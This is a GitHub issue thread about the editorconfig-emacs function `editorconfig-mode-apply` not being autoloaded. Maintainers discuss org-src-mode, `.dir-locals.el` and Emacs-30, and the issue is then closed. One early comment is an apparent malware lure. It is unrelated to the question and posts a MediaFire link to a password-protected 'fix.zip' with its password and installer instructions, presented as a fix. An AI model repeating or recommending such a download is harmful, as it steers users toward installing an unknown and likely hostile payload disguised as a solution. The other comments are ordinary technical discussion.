### ISSUE TITLE
editorconfig-mode-apply and autoload

### ISSUE THREAD

**Issue by bestlem** [editorconfig/editorconfig-emacs#357] opened 2024-08-26 10:20 UTC
I am trying to use `editorconfig-mode-apply` for Org-src-mode as suggested in https://github.com/editorconfig/editorconfig-emacs/issues/142#issuecomment-365497417

However it is failing to work in my setup as the function is void.

Looking at the code I see it is not autoloader and then Changelog for 0.11.0 says other functions are autoloaded and this one is not.

Why is this?

**Comment by NhutDang2002** [comment] 2024-08-26 10:20
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by monnier** [comment] 2024-08-26 13:22
Does org-src-mode obey the `.dir-locals.el` settings?
If it does not, then I suggest you file a bug report about it to the Org maintainers.
[ And if it does, then the editorconfig bundled with Emacs-30 should "just work".  ]

**Comment by bestlem** [comment] 2024-08-26 20:13
I want to set this for all org-mode not just in a single directory so why is  .dir-locals.el relevant?

**Comment by monnier** [comment] 2024-08-26 20:36
IIUC you want to use `.editorconfig` files to set some options in some org-mode situations, including org-src-mode.  IIUC this already works for normal Org files but not org-src-mode.
My question is whether you get the same problem when using `.dir-locals.el` instead of `.editorconfig`.

If that's the case, then I'd argue the problem is not in editorconfig but in Org, so you should (also) report it as a bug there.

[ And I also mention that if it works with `.dir-locals.el`, then this editorconfig problem should be fixed in the upcoming Emacs-30 where the bundled editorconfig support hooks itself a bit differently inside Emacs and should work just as well as `.dir-locals.el`.  ]

**Comment by 10sr** [comment] 2024-10-24 12:53
@bestlem Sorry I forgot there are cases where editorconfig-mode-apply is better than editorconfig-apply!

**Closed** 2024-10-24 12:58 UTC
